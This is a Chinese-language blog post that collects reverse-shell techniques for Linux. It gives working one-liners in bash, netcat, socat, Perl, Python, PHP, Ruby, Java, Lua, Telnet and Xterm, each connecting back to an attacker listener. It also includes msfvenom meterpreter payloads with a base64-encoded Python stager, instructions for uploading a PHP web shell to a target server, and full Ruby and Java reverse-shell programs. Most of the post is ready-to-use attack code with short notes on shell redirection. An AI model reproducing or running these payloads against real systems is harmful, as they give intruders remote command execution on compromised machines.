linux反弹shell
参考链接
http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html http://www.waitalone.cn/linux-shell-rebound-under-way.html http://roo7break.co.uk/?p=215 http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://www.91ri.org/9367.html
http://www.tuicool.com/articles/3uQ3ue
拓展阅读
linux设置启动执行命令:http://www.cnblogs.com/ssooking/p/6094740.html
反弹IP:10.0.0.1
监听端口:1234
Bash
[shell有时由bash解析有时由sh解析,不一定百发百中]
bash -i >& /dev/tcp/10.0.0.1/1234 0>&1
注:/dev/[tcp|upd]/host/port是Linux设备里面的特殊文件,读取或写入相当于建立socket调用
"&"在Linux shell中表示后台运行
但这里0>&1不是这样,对于&1更准确的说应该是文件描述符1。而1一般代表的就是STDOUT_FILENO***
2>&1形式用于重定向,2>表示错误重定向,&1表示标准输出;
以ls >/dev/null 2>&1为例:2>&1是将标准出错重定向到标准输出,在这里又被重定向到了/dev/null里
补充: http://www.cnblogs.com/hokyhu/archive/2011/09/27/2193489.html
Netcat
不同版本的nc不一定支持-e选项
nc -e cmd.exe 10.0.0.1 1234
nc -e /bin/sh 10.0.0.1 1234
nc不使用-e
Hacker: nc -lvnp 1234 Victim: mknod /tmp/backpipe p Victim: /bin/sh 0</tmp/backpipe | nc 10.0.0.1 1234 1>/tmp/backpipe
不使用nc Method 1: Hacker: nc -nvlpp 1234 Victim: /bin/bash -i > /dev/tcp/10.0.0.1/1234 0<&1 2>&1
Method 2: Hacker: nc -nvlpp 1234 Victim: mknod backpipe p && telnet 10.0.0.1 1234 0backpipe
Method 3: Hacker: nc -nvlpp 8080 Hacker: nc -nvlpp 8888 Victim: telnet 10.0.0.1 1234 | /bin/bash | telnet 10.0.0.1 1234
Method 4:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Method 5:
nc 10.0.0.1 1234|/bin/sh|nc x.x.x.x 2444
socat
socat tcp-connect:转发到某个主机的IP:端口 exec:'bash -li',pty,stderr,setsid,sigint,sane
socat是个非常强大的工具,跑个题,补充几个用法
连接远程端口 nc localhost 80 socat - TCP:localhost:80 监听端口 nc -lp localhost 700 socat TCP-LISTEN:700 - 正向shell nc -lp localhost 700 -e /bin/bash socat TCP-LISTEN:700 EXEC:/bin/bash SSL连接 SSL服务器: socat OPENSSL-LISTEN:443,cert=/cert.pem - 需要首先生成证书文件 SSL客户端: socat - OPENSSL:localhost:443 fork服务器 可以将一个使用标准输入输出的单进程程序变为一个使用fork方法的多进程服务 不同设备的通信 将U盘进行网络共享: socat -d -d /dev/ttyUSB1,raw,nonblock,ignoreeof,cr,echo=0 TCP4-LISTEN:5555,reuseaddr -d -d 指的是调试信息的级别 将终端转发到COM1: socat READLINE,history=$HOME/.cmd_history /dev/ttyS0,raw,echo=0,crnl
socat还有个readbyte的option,可以当dd用了。
PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 不依赖bin/bash perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('10.0.0.1',1234))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
Metasploit版的python代码:
#msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234 import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
base64解码后:
import socket,struct s=socket.socket(2,1) s.connect(('192.168.90.1',1234)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(4096) while len(d)!=l: d+=s.recv(4096) exec(d,{'s':s})
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' #代码假设TCP连接的文件描述符为3,如果不行可以试下4,5,6
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 不依赖于/bin/sh: ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' 目标是windows: ruby -rsocket -e 'c=TCPSocket.new(10.0.0.1","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Java
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() msf:use payload/java/shell/reverse_tcp
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 1234 0/tmp/p 或者 mknod backpipe p && telnet 10.0.0.1 1234 0<backpipe | /bin/bash 1>backpipe
lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" msf反弹:use payload/cmd/unix/reverse_lua
Xterm
首先开启Xserver: # TCP 6001 Xnest :1 # Note: The command starts with uppercase X
授予目标机连回来的权限: xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
如果想让任何人都连上: xhost + # Run this INSIDE the spawned xterm on the open X Server
假设xterm已安装,连回你的Xserver: xterm -display attackerip:1 或者:$ DISPLAY=attackerip:0 xterm
msfvenom生成web反弹shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw > test.php
生成后要将脚本最前面的注释符去掉,然后上传到目标服务器上
启动msf
use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST IP set LPORT port exploit -j
然后从浏览器中访问上传的脚本http://xxx.com/test.php,即可获得shell
# 反弹 ssh shell
$ wget -O - -q "http://www.test.com/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f username@<attacker_ip>"
一些msf模块里面的长脚本
Ruby
#!/usr/bin/env ruby require 'socket' require 'open3' #Set the Remote Host IP RHOST = "192.168.1.10" #Set the Remote Host Port PORT = "6667" #Tries to connect every 20 sec until it connects. begin sock = TCPSocket.new "#{RHOST}", "#{PORT}" sock.puts "We are connected!" rescue sleep 20 retry end #Runs the commands you type and sends you back the stdout and stderr. begin while line = sock.gets Open3.popen2e("#{line}") do | stdin, stdout_and_stderr | IO.copy_stream(stdout_and_stderr, sock) end end rescue retry end
JAVA
import java.io.*; import java.net.Socket; import java.util.*; import java.util.regex.*; import java.applet.Applet; public class poc extends Applet{ /** * Author: daniel baier alias duddits * Licens: GPL * Requirements: JRE 1.5 for running and the JDK 1.5 for compiling or higher * Version: 0.1 alpha release */ public String cd(String start, File currentDir) { File fullPath = new File(currentDir.getAbsolutePath()); String sparent = fullPath.getAbsoluteFile().toString(); return sparent + "/" + start; } @SuppressWarnings("unchecked") public void init() { poc rs = new poc(); PrintWriter out; try { Socket clientSocket = new Socket("192.168.5.222",10003); out = new PrintWriter(clientSocket.getOutputStream(), true); out.println("\tJRS 0.1 alpha release\n\tdeveloped by duddits alias daniel baier"); boolean run = true; String s; BufferedReader br = new BufferedReader(new InputStreamReader(clientSocket.getInputStream())); String startort = "/"; while (run) { String z1; File f = new File(startort); out.println(f.getAbsolutePath() + "> "); s = br.readLine(); z1 = s; Pattern pcd = Pattern.compile("^cd\\s"); Matcher mcd = pcd.matcher(z1); String[] teile1 = pcd.split(z1); if (s.equals("exit")) { run = false; }else if (s.equals(null) || s.equals("cmd") || s.equals("")) { } else if(mcd.find()){ try { String cds = rs.cd(teile1[1], new File(startort)); startort = cds; } catch (Exception verz) { out.println("Path " + teile1[1] + " not found."); } }else { String z2; z2 = s; Pattern pstring = Pattern.compile("\\s"); String[] plist = pstring.split(z2); try { LinkedList slist = new LinkedList(); for (int i = 0; i < plist.length; i++) { slist.add(plist[i]); } ProcessBuilder builder = new ProcessBuilder(slist); builder.directory(new File(startort)); Process p = builder.start(); Scanner se = new Scanner(p.getInputStream()); if (!se.hasNext()) { Scanner sa = new Scanner(p.getErrorStream()); while (sa.hasNext()) { out.println(sa.nextLine()); } } while (se.hasNext()) { out.println(se.nextLine()); } } catch (Exception err) { out.println(f.getAbsolutePath() + "> Command " + s + " failed!"); out.println(f.getAbsolutePath() +"> Please try cmd /c "+ s+" or bash -c " +s+" if this command is an shell buildin."); } } } if(!clientSocket.isConnected()){ run = false; out.flush(); out.close(); } } catch (Exception io) { //System.err.println("Connection refused by peer"); } } }
作者:ssooking 联系邮箱:c3Nvb2tpbmdAeWVhaC5uZXQ=
若无特殊说明,所发博文皆为原创,转载请务必注明出处、保留原文地址。欢迎交流分享!如果您有任何问题,请联系我!